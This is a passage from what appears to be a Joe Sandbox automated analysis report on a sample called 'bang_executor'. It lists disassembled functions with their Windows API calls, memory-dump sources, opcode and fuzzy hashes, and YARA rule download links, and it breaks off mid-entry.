                                        • Instruction Fuzzy Hash: 47F0B471081B428EDB308B22C458793B7E4AB12326F041B1FC0E3426E0D364B58D9641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EC37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004EC4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC4E6
                                          • Part of subcall function 004EC4A8: FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?), ref: 004EC516
                                          • Part of subcall function 004EC4A8: GetLastError.KERNEL32(?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A), ref: 004EC522
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC3A5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorLast
                                        • String ID:
                                        • API String ID: 1464966427-0
                                        • Opcode ID: 7b44f3d950ed77ab2d34053ce6bed32b787dc4263a116e5cfb94fd1830785a74
                                        • Instruction ID: 47b956723ac8d3c764d6064032a7310a36f58da1c214e8b0452bd96e9fc3e80b
                                        • Opcode Fuzzy Hash: 7b44f3d950ed77ab2d34053ce6bed32b787dc4263a116e5cfb94fd1830785a74
                                        • Instruction Fuzzy Hash: 8CF0B4350093C0AACA2217B65804BC77F915F25337F00CA0EF5FD52192C2A810959766
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F2EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 004F2F19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: afc68c39b06865ca2f9f2377ed26bc1d927e2633753e2d03144c429c670efbf6
                                        • Instruction ID: bfc5524483ef766db9349483da2e0e539bf7ff65b4a1512c4faf0abbef6591ed
                                        • Opcode Fuzzy Hash: afc68c39b06865ca2f9f2377ed26bc1d927e2633753e2d03144c429c670efbf6
                                        • Instruction Fuzzy Hash: 71D0571161515555D51537277C097FD36565FC731BF04005B7249771C3875D0C4661F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FC5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 004FC5BC
                                          • Part of subcall function 004FC34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004FC36E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                        • Instruction ID: ef9fbee158df01cb64d61d7da793a9dbc3b019871e248c86f97421b40ee6cf2e
                                        • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                        • Instruction Fuzzy Hash: 42D0A73020420DB7DF012B61CD0297F79D5EB00380F00C0267E41C5180EDB5DA106956
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 005001A4
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: e4a1b5baf3bcfd7c992eb49bba40eb85387f9edef5fea110a3f48187d657106d
                                        • Instruction ID: c3dc60a8c9abdb87ba724a8317fbfd8086620073cba6ec8e1f5637b2a63828de
                                        • Opcode Fuzzy Hash: e4a1b5baf3bcfd7c992eb49bba40eb85387f9edef5fea110a3f48187d657106d
                                        • Instruction Fuzzy Hash: 67D09E35148304AADA112B52CE06F1E7AA2BB99B09F004559B388350F186629E25AB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DloadProtectSection.DELAYIMP ref: 00500AC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DloadProtectSection
                                        • String ID:
                                        • API String ID: 2203082970-0
                                        • Opcode ID: 331663c4dce9f9dda97b77d4b969fc3caf796d48251742d635aca97e43ba08b1
                                        • Instruction ID: cb39d0cbc5503cb795ae25b69e9b69e97f29e583adeb3d7179226999123d891b
                                        • Opcode Fuzzy Hash: 331663c4dce9f9dda97b77d4b969fc3caf796d48251742d635aca97e43ba08b1
                                        • Instruction Fuzzy Hash: 79D01234E01B099FD219EB64DC8EBAC3E90BB6971CFD82800B505990D6E7B099C4A616
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,004EB18A,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB294
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: 5e532f564d4e4a8420cb35db030347b4f463cb4132d968e2cf818395bfe0ac06
                                        • Instruction ID: ee88e2d1354064fbb543172f34f5e0a7981f370aafa65b9673361b396d7be22c
                                        • Opcode Fuzzy Hash: 5e532f564d4e4a8420cb35db030347b4f463cb4132d968e2cf818395bfe0ac06
                                        • Instruction Fuzzy Hash: F5C01234400144954E304726A84D49F7311DF523677B482D5C168851A1C3278C47F644
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f7adb0528641d5efd85b8ff8e5a769ec8f75a7422709ad7b92c8930787abd36
                                        • Instruction ID: 8057e781a0f3f5d8a1fc1c8c541deea28b11ec2519419ed607a2528ae2b34d6b
                                        • Opcode Fuzzy Hash: 5f7adb0528641d5efd85b8ff8e5a769ec8f75a7422709ad7b92c8930787abd36
                                        • Instruction Fuzzy Hash: AAB0129635C407BE712411449C06D7F0D0CF6C0B14B31AE3AF004C00C094401C404132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 59961ac96039edc467f8aade6d02598a7c8cbda557e8e003b76dd739ecfd2c8f
                                        • Instruction ID: fcd256fa940cdef626d1e9593c32d1829d9c62a401873ec20680547bafb94c7f
                                        • Opcode Fuzzy Hash: 59961ac96039edc467f8aade6d02598a7c8cbda557e8e003b76dd739ecfd2c8f
                                        • Instruction Fuzzy Hash: 26B0129635C443AD711855489C06E7F0D8CF7C4B14B30E93AF408C01C0D4401C484232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: fecca9a307dd63ed332f070901d5d64e72656a5e0746c9f97711b7c233e4e1a5
                                        • Instruction ID: 1f3494707cac3b49d2577de25137dd120748b01faab35812160a05fa51894f21
                                        • Opcode Fuzzy Hash: fecca9a307dd63ed332f070901d5d64e72656a5e0746c9f97711b7c233e4e1a5
                                        • Instruction Fuzzy Hash: 28B0129635C543AD725851489C06E7F0D4CF7C4B14B30EE3AF008C01C0D4401C844232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 79f55242cb1051d2bb16f2d1cb7480eeafd217bce57192eb6eaf7398520c6d88
                                        • Instruction ID: 30ec83529867e5ca4291ffcc4877932c156f31b3f2a92f9f9269573a893ec704
                                        • Opcode Fuzzy Hash: 79f55242cb1051d2bb16f2d1cb7480eeafd217bce57192eb6eaf7398520c6d88
                                        • Instruction Fuzzy Hash: 43B0129A35C507AE71145148DC06E7F0D4CF6C4B14B30AD3AF008C11C0D4401C404332
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 642690cc4f4480c2677655a307068146bd0c7a6c279e32d78b098e1ec9be9000
                                        • Instruction ID: 91eb20eeaf37d0056771bef4d4e67da7244b91457d6317bd69a45d51fb97dffc
                                        • Opcode Fuzzy Hash: 642690cc4f4480c2677655a307068146bd0c7a6c279e32d78b098e1ec9be9000
                                        • Instruction Fuzzy Hash: D1B0129635C403AD711851989C06E7F0D4CF7C4B14B30ED3AF008C01C0D4401C444232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4101ab6fcb1af6f863876b590923764214415df694f90e6c26690ef8bffe5bf7
                                        • Instruction ID: ac18e716a0dd4d5cc5c878e31f7b22f839c72ce8ca9e6728399cd0ab887454da
                                        • Opcode Fuzzy Hash: 4101ab6fcb1af6f863876b590923764214415df694f90e6c26690ef8bffe5bf7
                                        • Instruction Fuzzy Hash: 18B012A635C443AD711451489C06E7F0D4CF6C4B14B30FA3AF408C00C0D4401C445232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 04c0e9ce5bbd86360bc2fd3f79b2052dbcd56bf4cc07ad8fecb1d6c978d12dcd
                                        • Instruction ID: 6c7379acbc64338742d1b9ac5b03856f01bb642a9d5a7d5e6a4d495c0cc8061b
                                        • Opcode Fuzzy Hash: 04c0e9ce5bbd86360bc2fd3f79b2052dbcd56bf4cc07ad8fecb1d6c978d12dcd
                                        • Instruction Fuzzy Hash: 66B0129635C403AD711851489D06E7F0D4CF7C4B14B30E93AF408C01C0D4411C494232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
